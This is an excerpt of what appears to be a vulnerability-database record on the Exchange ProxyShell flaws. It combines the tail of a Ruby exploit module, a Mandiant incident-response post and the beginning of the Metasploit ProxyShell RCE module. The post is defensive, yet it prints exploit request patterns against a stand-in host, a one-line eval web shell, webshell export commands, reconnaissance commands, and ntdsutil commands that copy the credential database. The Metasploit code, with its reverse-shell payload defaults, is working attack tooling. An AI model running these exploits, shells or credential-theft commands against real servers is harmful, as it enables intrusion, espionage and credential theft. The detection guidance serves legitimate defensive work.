endpoint\n @ssrf_proc = options[:ssrf_proc]\n end\n\n def send_request(message)\n resp = @ssrf_proc.call('POST', @endpoint.path, { ctype: 'application/soap+xml;charset=UTF-8', data: message })\n WinRM::ResponseHandler.new(resp.body, resp.code).parse_to_xml\n end\n end\n\n def create_transport(connection_opts)\n raise NotImplementedError unless connection_opts[:transport] == :ssrf\n\n super\n end\n\n private\n\n def init_ssrf_transport(opts)\n HttpSsrf.new(opts[:endpoint], opts)\n end\n end\n\n module PowerShell\n def send_command(command, _arguments)\n command_id = SecureRandom.uuid.to_s.upcase\n message = MessageFactory.create_pipeline_message(@runspace_id, command_id, command)\n fragmenter.fragment(message) do |fragment|\n command_args = [connection_opts, shell_id, command_id, fragment]\n if fragment.start_fragment\n resp_doc = transport.send_request(WinRM::WSMV::CreatePipeline.new(*command_args).build)\n command_id = REXML::XPath.first(resp_doc, \"//*[local-name() = 'CommandId']\").text\n else\n transport.send_request(WinRM::WSMV::SendData.new(*command_args).build)\n end\n end\n\n command_id\n end\n end\n\n def initialize(connection_opts)\n # these have to be set to truthy values to pass the option validation, but they're not actually used because hax\n connection_opts.merge!({ user: :ssrf, password: :ssrf })\n super(connection_opts)\n end\n\n def transport\n @transport ||= begin\n transport_factory = TransportFactory.new\n transport_factory.create_transport(@connection_opts)\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/36667", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2021-09-07T14:46:37", "description": "In August 2021, Mandiant Managed Defense identified and responded to the exploitation of a chain of vulnerabilities known as ProxyShell.** **The ProxyShell vulnerabilities consist of three CVEs (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) affecting the following versions of on-premises Microsoft Exchange Servers.\n\n * Exchange Server 2013 (Cumulative Update 23 and below)\n * Exchange Server 2016 (Cumulative Update 20 and below)\n * Exchange Server 2019 (Cumulative Update 9 and below)\n\nThe vulnerabilities are being tracked in the following CVEs:\n\n**CVE**\n\n| \n\n**Risk Rating**\n\n| \n\n**Access Vector**\n\n| \n\n**Exploitability**\n\n| \n\n**Ease of Attack**\n\n| \n\n**Mandiant Intel** \n \n---|---|---|---|---|--- \n \nCVE-2021-34473\n\n| \n\nHigh\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://advantage.mandiant.com/cve/vulnerability--8e100992-6111-54ed-96b4-f817cf47edd0>) \n \nCVE-2021-34523\n\n| \n\nLow\n\n| \n\nLocal\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://advantage.mandiant.com/cve/vulnerability--f8db969d-dddf-5b2e-81ce-439289be6cde>) \n \nCVE-2021-31207\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://advantage.mandiant.com/cve/vulnerability--5c5c0f7e-96a8-5403-8487-373322342c46>) \n \nTable 1: List of May & July 2021 Microsoft Exchange CVEs and FireEye Intel Summaries\n\n#### Overview\n\nMicrosoft Exchange Server provides email and supporting services for organizations. This solution is used globally, both on-premises and in the cloud. This chain of vulnerabilities exists in unpatched on-premises editions of Microsoft Exchange Server only and is being actively exploited on those servers accessible on the Internet.\n\nMandiant responded to multiple intrusions impacting a wide variety of industries including Education, Government, Business services, and Telecommunications. These organizations are based in the United States, Europe, and Middle East. However, targeting is almost certainly broader than directly observed.\n\nOne specific targeted attack observed by Mandiant, detailed in this post, was against a US-based university where UNC2980 exploited ProxyShell vulnerabilities to gain access to the environment.\n\n#### The Exploit Chain Explained\n\nProxyShell refers to a chain of attacks that exploit three different vulnerabilities affecting on-premises Microsoft Exchange servers to achieve pre-authenticated remote code execution (RCE). The exploitation chain was discovered and [published](<https://www.zerodayinitiative.com/blog/2021/8/17/from-pwn2own-2021-a-new-attack-surface-on-microsoft-exchange-proxyshell>) by Orange Tsai (@orange_8361) from the DEVCORE Research Team.\n\n##### Delivering the Payload\n\nIn order to later create a web shell on a Microsoft Exchange server by exporting from a mailbox, an attacker first needs to create an email item within a mailbox. In the Metasploit implementation of the attack, the Autodiscover service is abused to leak a known user\u2019s distinguished name (DN), which is an address format used internally within Microsoft Exchange. The Messaging Application Programming Interface (MAPI) is then leveraged to leak the user's security identifier (SID), by passing the previously leaked DN as a request. The SID is then used to forge an access token to communicate with Exchange Web Services (EWS).\n\nWith the attacker able to successfully impersonate the target user with a valid access token, they can perform EWS operations. To continue with the ProxyShell attack, the operation \u2018CreateItem\u2019 is used, which allows the remote creation of email messages in the impersonated user\u2019s mailbox. While responding, Mandiant has seen draft emails with attached web shells, encoded in such a way that they become decoded upon export to PST later in the attack (specifically with permutative encoding).\n\nEmails may also be placed in targeted users' mailboxes via SMTP, as was suggested in Orange Tsai\u2019s documentation of the attack.\n\n##### CVE-2021-34473 \u2014 Pre-auth Path Confusion Leads to ACL Bypass\n\nMicrosoft Exchange has a feature called \u2018Explicit Logon\u2019, which legitimately allows users to open another user's mailbox or calendar in a new browser window by providing the mailbox address in the URL. The feature was designed to only provide access where \u2018Full Access\u2019 is granted to the user, and the target mailbox or calendar is configured to publish. Exchange is designed to normalize the specified mailbox address in the URL to identify the target.\n\nThe vulnerability exists in passing the string Autodiscover/Autodiscover.json to the email field in the URL. By passing that string, Exchange does not perform sufficient checks on the address, and through its normalization process, this leads to arbitrary access to backend URLs as NT AUTHORITY/SYSTEM.\n\nGET /autodiscover/autodiscover.json?@evil.corp/?&Email=autodiscover/autodiscover.json%3F@evil.corp\n\nGET /autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp\n\nPOST /autodiscover/autodiscover.json?@evil.corp/autodiscover/autodiscover.xml?&Email=autodiscover/autodiscover.json%3F@evil.corp\n\nPOST /autodiscover/autodiscover.json?@evil.corp/mapi/emsmdb?&Email=autodiscover/autodiscover.json%3F@evil.corp \n \n--- \n \nFigure 1: Requests showing how an attacker can abuse the normalization process of the Explicit Logon feature\n\n##### CVE-2021-34523 \u2014 Elevation of Privilege on Exchange PowerShell Backend\n\nThe Exchange PowerShell Remoting feature, natively built into Microsoft Exchange, was designed to assist with administrative activities via the command line. The previous exploit allowed an attacker to interface with arbitrary backend URLs as NT AUTHORITY/SYSTEM, however since that user does not have a mailbox, the attacker cannot directly interface with the PowerShell backend (/Powershell) at that privilege level.\n\nThe PowerShell backend checks for the X-CommonAccessToken header in incoming requests. If the header does not exist, another method is used to get a CommonAccessToken. This method checks for the X-Rps-CAT parameter in the incoming request, and if present, deserializes this to a valid CommonAccessToken. With the previously collected information on the target mailbox or default information from built-in mailboxes, passing of a valid X-Rps-CAT value is trivial.\n\nBy passing this value to the PowerShell backend with the previously successful access token, an attacker can downgrade from the NT AUTHORITY/SYSTEM account to the target user. This user must have local administrative privileges in order to execute arbitrary Exchange PowerShell commands.\n\nPOST /autodiscover/autodiscover.json?a=abcde@evil.com/powershell/?X-Rps-CAT=[Base64 encoded data] \n \n--- \n \nFigure 2: This request uses the parameter X-Rps-CAT, which allows valid user impersonation\n\n##### CVE-2021-31207 \u2014 Post-auth Arbitrary-File-Write Leads to RCE\n\nOnce the two previous vulnerabilities are exploited successfully, the vulnerability CVE-2021-31207 allows the attacker to write files. As soon as the attacker is able to execute arbitrary PowerShell commands, and the required \u2018Import Export Mailbox\u2019 role is assigned to the impersonated user (which can be achieved by execution of the New-ManagementRoleAssignment cmdlet), the cmdlet New-MailboxExportRequest can be used to export a user\u2019s mailbox to a specific desired path e.g.\n\nNew-MailBoxExportRequest \u2013 Mailbox john.doe@enterprise.corp -FilePath \\\\\\127.0.0.1\\C$\\path\\to\\webshell.aspx \n \n--- \n \nFigure 3: New-MailBoxExportRequest can be used to export payloads\n\nThe use of New-MailboxExportRequest allows the attacker to export target mailboxes where previously created emails with encoded web shells were created. The attacker can export the mailbox to a PST file format with a web file extension, such as ASPX, which allows the attacker to drop a functional web shell, since the encoded attachments in the email are decoded upon write to the PST file format. This is due to the PST file format using permutative encoding, by attaching a pre-encoded payload, upon export the decoded payload is actually written.\n\n#### Observations From Investigations\n\nMandiant responded to intrusions involving ProxyShell exploitation across a range of customers and industries. Examples of proof-of-concept (PoC) exploits developed and released publicly by security researchers could be leveraged by any threat group, leading to adoption by threat groups with varying levels of sophistication. Mandiant has observed the exploit chain resulting in post-exploitation activities, including the deployment of web shells, backdoors, and tunneling utilities to further compromise victim organizations. As of the release of this blog post, Mandiant tracks eight [UNC groups](<https://www.fireeye.com/blog/products-and-services/2020/12/how-mandiant-tracks-uncategorized-threat-actors.html>) exploiting the ProxyShell vulnerabilities. Mandiant anticipates more clusters will be formed as different threat actors adopt working exploits.\n\n##### Exploitation\n\nMandiant has observed the exploitation of Proxyshell starting with the abuse of Autodiscover services to leak known users distinguished name (DN) to then leverage it to leak the administrator security identifier (SID). \n \nBy using the leaked DN and SID, the attacker can create a mailbox that contains a draft email with a malicious payload as an attachment. Afterwards, the mailbox and the contained payload are exported to a web-accessible directory or another directory on the host.\n\nAttempted exploitation of ProxyShell appears to be mostly automated. In some cases, Mandiant observed only partial attacker success, such as the creation of items in mailboxes remotely, but not the exporting of mailboxes and their contained payloads to another directory on the host.\n\nMandiant has observed a wide range of source IP addresses and user agents attempting HTTP requests consistent with the first stage of the ProxyShell exploit chain.\n\n##### Post-Exploitation\n\nUpon successful exploitation of the vulnerabilities, Mandiant observed multiple payloads to gain a foothold in the network including CHINACHOP and BLUEBEAM web shells (see Malware Definitions section). Follow-on actions include execution of internal reconnaissance commands on servers, and deployment of tunneler utilities.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/proxyshell-exchange-servers/fig4-pst.png) \nFigure 4: BLUEBEAM ASP web shell that was embedded into a PST payload\n\n#### Threat Actor Spotlight: UNC2980\n\nIn August 2021, Mandiant Managed Defense responded to an intrusion leveraging the ProxyShell vulnerability at a US-based university. Mandiant tracks this threat actor as UNC2980.\n\nUNC2980 is a cluster of threat activity tracked since August 2021 and believed to be conducting cyber espionage operations. Mandiant suspects this group to be operating from China currently assessed at low confidence. UNC2980 has been observed exploiting CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, publicly referred to as \"ProxyShell\", to upload web shells for initial access. The group relies on multiple publicly available tools including EARTHWORM, HTRAN, MIMIKATZ, and WMIEXEC post compromise.\n\n#### UNC2980 in Action\n\nUpon gaining access through the exploitation of ProxyShell and deploying a web shell, UNC2980 dropped multiple tools into the victim environment. The following publicly available tools were observed on the initial compromised host: HTRAN, EARTHWORM, and several MIMIKATZ variants.\n\n<script language='JScript' runat='server' Page aspcompat=true>function Page_Load(){eval(Request['cmd'],'unsafe');}</script> \n \n--- \n \nFigure 5: Web shell embedded in PST payload used by UNC2980\n\nApproximately 11 hours and 44 minutes after the ProxyShell exploitation, Mandiant observed post-exploitation activity beginning with multiple Event ID 4648 (A logon was attempted using explicit credentials) events initiated by the process C:\\root\\mimikatz.exe on the initial compromised host. All Event ID 4648 events were associated with two different domain controllers within the environment.\n\nThe group then utilized the utility WMIEXEC to conduct post-exploitation activity. This was primarily observed through the default redirection of command output used by WMIEXEC.\n\ncmd.exe /c whoami > C:\\wmi.dll 2>&1\n\ncmd.exe /c quser > C:\\wmi.dll 2>&1\n\ncmd.exe /c net localgroup administrators > C:\\wmi.dll 2>&1 \n \n--- \n \nFigure 6: Reconnaissance commands executed via WMICEXEC\n\nUNC2980 was observed utilizing several techniques for credential theft once access to a host was established. In one instance, after performing reconnaissance, UNC2980 deployed multiple variants of MIMIKATZ. In another instance, UNC2980 utilized multiple batch files which executed ntdsutil to enumerate snapshots of volumes and were then used to copy ntds.dit and the System hive.\n\nntdsutil snapshot \"List All\" quit quit >>c:\\temp\\1.txt\n\nntdsutil snapshot \"unmount {[GUID]}\" quit quit\n\nnet localgroup administrators\n\nntdsutil snapshot \"activate instance ntds\" create quit quit\n\nntdsutil snapshot \"delete {[GUID] }\" quit quit\n\nntdsutil snapshot \"mount {[GUID]}\" quit quit\n\ncopy c:\\$SNAP_[date]_VOLUMEC$\\windows\\ntds\\ntds.dit c:\\temp\\ntds.dit\n\nreg save hklm\\system c:\\temp\\s.hive \n \n--- \n \nFigure 7: Executed Batch commands\n\n#### Monitoring and Investigating\n\nMandiant recommends monitoring or investigating for compromise on presently or previously vulnerable Exchange servers.\n\n##### Remote Creation of Items in Mailboxes\n\n * Monitor or investigate irregular Exchange EWS logs to identify CreateItem requests, indicating the remote creation of items.\n * Mandiant has observed draft emails created, containing attached encoded web shells, though other items may also be created.\n * Examine logs under \u2018Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\Ews\\\\*\u2019 where:\n * AuthenticatedUser is SYSTEM or a system account\n * SoapAction is CreateItem\n * HttpStatus is 200 (indicating success)\n * Monitor or identify draft emails with encoded attachments.\n * Mandiant has observed draft emails containing .TXT file attachments with encoded content.\n\n##### Remote Unauthenticated PowerShell\n\n * Monitor IIS logs for successful POST requests containing \"/autodiscover/autodiscover.json\" & \"Powershell\".\n * Monitor or investigate the execution of the PowerShell cmdlets \u2018New-ManagementRoleAssignment\u2019 or \u2018New-MailboxExportRequest\u2019.\n * Mandiant has observed \u2018New-ManagementRoleAssignment\u2019 being used to assign mailbox import and export permissions to target mailboxes, followed by \u2018New-MailboxExportRequest\u2019 to export the drafts folder containing emails with encoded web shells attached.\n * Examine PowerShell ScriptBlock, transcription, and module logging where enabled.\n * Examine logs under \u2018Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\CmdletInfra\\Powershell-Proxy\\Cmdlet\\\\*\u2019, especially the cmdlet parameters where:\n * AuthenticatedUser is the name of impersonated mailbox user\n * ProcessName contains w3wp\n * Cmdlet is \u2018New-ManagementRoleAssignment\u2019 or \u2018New-MailboxExportRequest\u2019\n * Mandiant has observed the \u2018CmdletInfra\\Powershell-Proxy\\Cmdlet\u2019 logs recording remote cmdlets and their parameters even when regular PowerShell ScriptBlock/transcription/module logging is not enabled.\n * Mandiant recommends review of these logs on presently or previously vulnerable servers even in cases where no web shell is identified, since attackers may execute any PowerShell cmdlet, utilizing only part of the exploit chain.\n * Examine the \u2018Data\u2019 field in the Audit logs stored under \u2018\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\LocalQueue\\Exchange\\\\*\u2019. This field contains JSON data with the Operation Key value containing the executed PowerShell cmdlets.\n\n#### Creation or Use of Web Shells\n\n * Monitor or identify .ASPX files created under the path inetpub\\wwwroot\\aspnet_client written by SYSTEM.\n * Monitor or identify PST files (by header \u2018!BDN\u2019 / 0x2142444E) with web file extensions (commonly .ASPX). These files may be written by MSMailboxReplication.exe or w3wp.exe (the latter can be the result of replication events due to the exploitation of a different Exchange server in the same cluster).\n * Monitor or identify files created by MSMailboxReplication.exe with extensions other than .PST (this binary is used by the New-MailboxExportRequest PowerShell cmdlet).\n * Monitor or identify arbitrary commands spawned by the process w3wp.exe.\n * Monitor or investigate the \u2018MSExchange Management\u2019 Event logs (EID: 1 and EID: 6) to identify \u2018New-MailboxExportRequest\u2019 requests with .ASPX extensions, indicative of a web shell creation attempt.\n\nAdditional attempted or successful exploitation may be identified by analyzing network and IIS logs looking for HTTP requests matching some of the patterns described in this report.\n\n * Requests against /autodiscover/autodiscover.json containing \u2018powershell\u2019, \u2018mapi/nspi\u2019, \u2018mapi/emsmdb\u2019, \u2018/EWS\u2019 or \u2018X-Rps-CAT'.\n * Status codes 200, 301, or 302 indicating successful exploitation.\n * Status codes 400, 401, or 404 indicating attempted exploitation.\n\n#### Prevention and Remediation\n\nMandiant advises all organizations to apply patches [KB5003435](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-may-11-2021-kb5003435-028bd051-b2f1-4310-8f35-c41c9ce5a2f1>) (CVE-2021-31207) and [KB5001779](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-april-13-2021-kb5001779-8e08f3b3-fc7b-466c-bbb7-5d5aa16ef064>) (CVE-2021-34473 and CVE-2021-34523) to vulnerable on-premises Microsoft Exchange servers to mitigate these vulnerabilities being exploited. To verify the current version of on-premises Microsoft Exchange running within an organization, reference this [Microsoft resource](<https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates>).\n\nIf an organization is not able to immediately apply the patches, inbound TCP/80 and TCP/443 traffic to on-premises Exchange servers should be explicitly blocked from the Internet.\n\nAdditionally, Mandiant recommends organizations review their detection and response capabilities, especially on public-facing infrastructure, including:\n\n * Deploying and configuring a File Integrity Monitoring solution to monitor and/or prevent the creation of files, especially on web servers outside of maintenance windows\n * Deploying, configuring, and monitoring an Endpoint Detection and Response solution to alert to and respond to malicious activity effectively\n * Enabling enhanced logging and implementing sufficient log retention periods to support investigations, including:\n * Microsoft Systems Monitor (Sysmon) on Windows Servers\n * PowerShell Module, Script Block, and Transcription Logging\n\n#### Detecting the Techniques\n\n**Product**\n\n| \n\n**Signature** \n \n---|--- \n \nFireEye Endpoint Security\n\n| \n\n * PST FILEWRITE WITH ASP EXTENSION (METHODOLOGY)\n * W3WP.EXE CHILD PROCESS RECON COMMAND (METHODOLOGY)\n * WMICEXEC (FAMILY) \n \nFireEye Network Security\n\n| \n\n * Exploit.PY.ProxyShell\n * Microsoft Exchange CVE-2021-34473 Remote Code Execution\n * FE_Microsoft Exchange CVE-2021-34473 Remote Code Execution \n \nFireEye Email Security\n\nFireEye Detection On Demand\n\nFireEye Malware File Scanning\n\nFireEye Malware File Storage Scanning\n\n| \n\n * FEC_Exploit_PY_ProxyShell\n * FE_Hunting_PSTWithEmbeddedWebShell\n * FE_Exploit_PY_ProxyShell \n \nFireEye Helix\n\n| \n\n * MICROSOFT EXCHANGE [ProxyShell Exploit Attempt]\n * MICROSOFT EXCHANGE [ProxyShell Exploit Success]\n * MICROSOFT EXCHANGE [Post-Auth Arbitrary-File-Write (CVE-2021-31207) - Mailbox Export]\n * MICROSOFT EXCHANGE [Post-Auth Arbitrary-File-Write (CVE-2021-31207) - Certificate Request Export] \n \n#### Mandiant Security Validation Action\n\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\n\n**VID**\n\n| \n\n**Name** \n \n---|--- \n \nA101-827\n\n| \n\nApplication Vulnerability - CVE-2021- 34473, ProxyShell Vulnerability Check \n \nA101-829\n\n| \n\nApplication Vulnerability - ProxyShell, Exploitation \n \nA101-839\n\n| \n\nMalicious File Transfer - ProxyShell WebShell, Download \n \n#### Malware Definitions\n\n##### BLUEBEAM\n\nBLUEBEAM (aka. Godzilla) is a publicly available web shell management tool written in JAVA. BLUEBEAM can generate web shell payloads in JSP, ASP[.]NET, and PHP, it also supports AES encryption.\n\nBLUEBEAM contains 20 built-in modules that provide features such as loading additional web shells into memory, shell execution, mimikatz, meterpreter, file compression, and privilege escalation.\n\n##### HTRAN\n\nHTRAN is a publicly available tunneler written in C/C++ that serves as a proxy between two endpoints specified via command line arguments.\n\n##### EARTHWORM\n\nEARTHWORM is a publicly available tunneler utility. It is capable of establishing a tunnel to a SOCKS v5 server and is supported on the following operating systems: Linux, MacOS, and Arm-Linux.\n\n##### CHINACHOP\n\nThe CHOPPER web shell is a simple code injection web shell that is capable of executing Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with webserver account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.\n\nFor more detailed analysis, see our blog post on the China Chopper web shell.\n\n#### Acknowledgements\n\nAlex Pennino, Andrew Rector, Harris Ansari and Yash Gupta\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-03T10:00:00", "type": "fireeye", "title": "PST, Want a Shell? ProxyShell Exploiting Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-09-03T10:00:00", "id": "FIREEYE:FC60CAB5C936FF70E94A7C9307805695", "href": "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-08-07T01:57:48", "description": "This module exploits a vulnerability on Microsoft Exchange Server that allows an attacker to bypass the authentication (CVE-2021-31207), impersonate an arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve the RCE (Remote Code Execution). By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server. This vulnerability affects Exchange 2013 CU23 < 15.0.1497.15, Exchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5, Exchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9. All components are vulnerable by default.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-18T14:50:34", "type": "metasploit", "title": "Microsoft Exchange ProxyShell RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-12-02T20:58:50", "id": "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYSHELL_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyShell RCE',\n 'Description' => %q{\n This module exploits a vulnerability on Microsoft Exchange Server that\n allows an attacker to bypass the authentication (CVE-2021-31207), impersonate an\n arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects Exchange 2013 CU23 < 15.0.1497.15,\n Exchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5,\n Exchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9.\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Discovery\n 'Jang (@testanull)', # Vulnerability analysis\n 'PeterJson', # Vulnerability analysis\n 'brandonshi123', # Vulnerability analysis\n 'mekhalleh (RAMELLA S\u00e9bastien)', # exchange_proxylogon_rce template\n 'Donny Maasland', # Procedure optimizations (email enumeration)\n 'Rich Warren', # Procedure optimizations (email enumeration)\n 'Spencer McIntyre', # Metasploit module\n 'wvu' # Testing\n ],\n 'References' => [\n [ 'CVE', '2021-34473' ],\n [ 'CVE', '2021-34523' ],\n [ 'CVE', '2021-31207' ],\n [ 'URL', 'https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1' ],\n [ 'URL', 'https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf' ],\n [ 'URL', 'https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/' ],\n [ 'URL', 'https://github.com/dmaasland/proxyshell-poc' ]\n ],\n 'DisclosureDate' => '2021-04-06', # pwn2own 2021\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Platform' => ['windows'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Powershell',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_powershell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD],\n 'Type' => :windows_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'AKA' => ['ProxyShell'],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n )\n )\n\n register_options([\n OptString.new('EMAIL', [false, 'A known email address for this organization']),\n OptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false]),\n ])\n\n register_advanced_options([\n OptString.new('BackendServerName', [false, 'Force the name of the backend Exchange server targeted']),\n OptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']),\n OptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']),\n OptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']),\n OptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']),\n OptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002'])\n ])\n end\n\n def check\n @ssrf_email ||= Faker::Internet.email\n res = send_http('GET', '/mapi/nspi/')\n return CheckCode::Unknown if res.nil?\n return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'\n\n CheckCode::Vulnerable\n end\n\n def cmd_windows_generic?\n datastore['PAYLOAD'] == 'cmd/windows/generic'\n end\n\n def encode_cmd(cmd)\n cmd.gsub!('\\\\', '\\\\\\\\\\\\')\n cmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b')\n end\n\n def random_mapi_id\n id = \"{#{Rex::Text.rand_text_hex(8)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\"\n id.upcase\n end\n\n def request_autodiscover(email)\n xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }\n\n response = send_http(\n 'POST',\n '/autodiscover/autodiscover.xml',\n data: XMLTemplate.render('soap_autodiscover', email: email),\n ctype: 'text/xml; charset=utf-8'\n )\n\n case response.body\n when %r{<ErrorCode>500</ErrorCode>}\n fail_with(Failure::NotFound, 'No Autodiscover information was found')\n when %r{<Action>redirectAddr</Action>}\n fail_with(Failure::NotFound, 'No email address was found')\n end\n\n xml = Nokogiri::XML.parse(response.body)\n\n legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content\n fail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty?\n\n server = ''\n xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|\n type = item.at_xpath('./xmlns:Type', xmlns)&.content\n if type == 'EXCH'\n server = item.at_xpath('./xmlns:Server', xmlns)&.content\n end\n end\n fail_with(Failure::NotFound, 'No 